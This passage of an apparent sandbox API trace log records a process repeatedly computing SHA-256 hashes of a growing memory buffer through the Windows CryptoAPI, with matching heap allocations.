	[0217.123] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.124] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.124] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0217.124] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737318
	[0217.124] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737318, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737318, pdwDataLen=0x1284a8) returned 1
	[0217.124] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.124] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.124] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.124] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.124] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0217.124] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737340
	[0217.124] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737340, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737340, pdwDataLen=0x1284a8) returned 1
	[0217.124] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.125] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.125] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.125] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.125] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0217.125] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737368
	[0217.125] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737368, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737368, pdwDataLen=0x1284a8) returned 1
	[0217.125] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.125] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.125] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.125] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.125] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0217.126] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737390
	[0217.126] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737390, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737390, pdwDataLen=0x1284a8) returned 1
	[0217.126] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.126] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.126] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.126] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.126] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0217.126] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27373b8
	[0217.126] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27373b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27373b8, pdwDataLen=0x1284a8) returned 1
	[0217.126] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.126] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.126] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.127] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.127] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0217.127] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27373e0
	[0217.127] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27373e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27373e0, pdwDataLen=0x1284a8) returned 1
	[0217.127] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.127] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.127] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.127] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.127] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0217.127] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737408
	[0217.127] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737408, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737408, pdwDataLen=0x1284a8) returned 1
	[0217.127] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.127] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.127] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.128] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.128] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0217.128] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737430
	[0217.128] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737430, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737430, pdwDataLen=0x1284a8) returned 1
	[0217.128] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.128] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.128] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.128] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.128] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0217.128] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737458
	[0217.128] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737458, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737458, pdwDataLen=0x1284a8) returned 1
	[0217.128] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.128] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.128] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.129] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.129] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0217.129] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737480
	[0217.129] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737480, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737480, pdwDataLen=0x1284a8) returned 1
	[0217.129] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.129] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.129] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.129] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.129] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0217.129] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27374a8
	[0217.129] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27374a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27374a8, pdwDataLen=0x1284a8) returned 1
	[0217.130] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.130] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.130] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.130] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.130] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0217.130] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27374d0
	[0217.130] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27374d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27374d0, pdwDataLen=0x1284a8) returned 1
	[0217.130] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.130] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.130] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.130] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.130] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0217.131] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27374f8
	[0217.131] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27374f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27374f8, pdwDataLen=0x1284a8) returned 1
	[0217.131] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.131] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.131] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.131] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.131] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0217.131] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737520
	[0217.131] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737520, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737520, pdwDataLen=0x1284a8) returned 1
	[0217.131] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.131] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.131] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.132] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.132] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0217.132] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737548
	[0217.132] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737548, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737548, pdwDataLen=0x1284a8) returned 1
	[0217.132] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.132] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.132] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.132] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.132] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0217.132] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737570
	[0217.132] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737570, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737570, pdwDataLen=0x1284a8) returned 1
	[0217.132] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.132] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.132] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.133] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.133] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0217.133] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737598
	[0217.133] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737598, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737598, pdwDataLen=0x1284a8) returned 1
	[0217.133] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.133] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.133] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.133] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.133] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0217.133] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27375c0
	[0217.133] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27375c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27375c0, pdwDataLen=0x1284a8) returned 1
	[0217.133] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.133] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.133] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.134] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.134] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0217.134] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27375e8
	[0217.134] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27375e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27375e8, pdwDataLen=0x1284a8) returned 1
	[0217.134] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.134] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.134] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.134] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.134] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0217.134] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737610
	[0217.134] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737610, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737610, pdwDataLen=0x1284a8) returned 1
	[0217.134] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.134] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.134] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.135] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.135] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0217.135] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737638
	[0217.135] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737638, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737638, pdwDataLen=0x1284a8) returned 1
	[0217.135] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.135] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.135] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.135] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.135] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0217.135] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737660
	[0217.135] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737660, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737660, pdwDataLen=0x1284a8) returned 1
	[0217.135] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.135] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.135] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.136] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.136] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0217.136] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737688
	[0217.136] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737688, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737688, pdwDataLen=0x1284a8) returned 1
	[0217.136] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.136] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.136] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.136] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.136] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0217.136] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27376b0
	[0217.136] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27376b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27376b0, pdwDataLen=0x1284a8) returned 1
	[0217.136] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.136] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.136] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.137] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.137] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0217.137] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27376d8
